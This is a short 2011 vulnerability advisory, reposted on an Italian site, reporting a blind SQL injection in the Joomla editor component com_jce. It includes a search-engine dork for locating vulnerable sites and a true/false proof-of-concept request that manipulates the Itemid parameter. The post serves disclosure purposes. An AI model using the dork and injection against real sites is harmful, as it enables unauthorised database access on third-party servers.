Creato Venerdì, 15 Aprile 2011 00:08
===================================================================
joomlacontenteditor (com_jce) BLIND sql injection vulnerability |
=================================================================== |
|
Software: joomlacontenteditor (com_jce) |
Vendor: www.joomlacontenteditor.net |
Vuln Type: BLind SQL Injection |
Download link: http://www.joomlacontenteditor.net/downloads/editor/joomla15x/category/joomla-15-2 (check here) |
Author: eidelweiss |
contact: eidelweiss[at]windowslive[dot]com |
Home: www.eidelweiss.info |
Dork: inurl:"/index.php?option=com_jce" |
|
|
References: http://eidelweiss-advisories.blogspot.com/2011/04/joomlacontenteditor-comjce-blind-sql.html |
|
|
=================================================================== |
Description: |
JCE makes creating and editing Joomla!® |
content easy Add a set of tools to your Joomla!® environment that give you the power to create the kind of content you want, |
without limitations, and without needing to know or learn HTML, XHTML, CSS... |
=================================================================== |
exploit & p0c |
|
[!] index.php?option=com_jce&Itemid=[valid Itemid] |
|
Example p0c |
|
[!] http://host/index.php?option=com_jce&Itemid=8 <= True |
[!] http://host/index.php?option=com_jce&Itemid=-8 <= False |
|
|
==================================================================== |
|
Nothing Impossible In This World Even Nobody`s Perfect |
|
=================================================================== |
|
==========================| -=[ E0F ]=- |==========================
Categoria: Vulnerabilità Joomla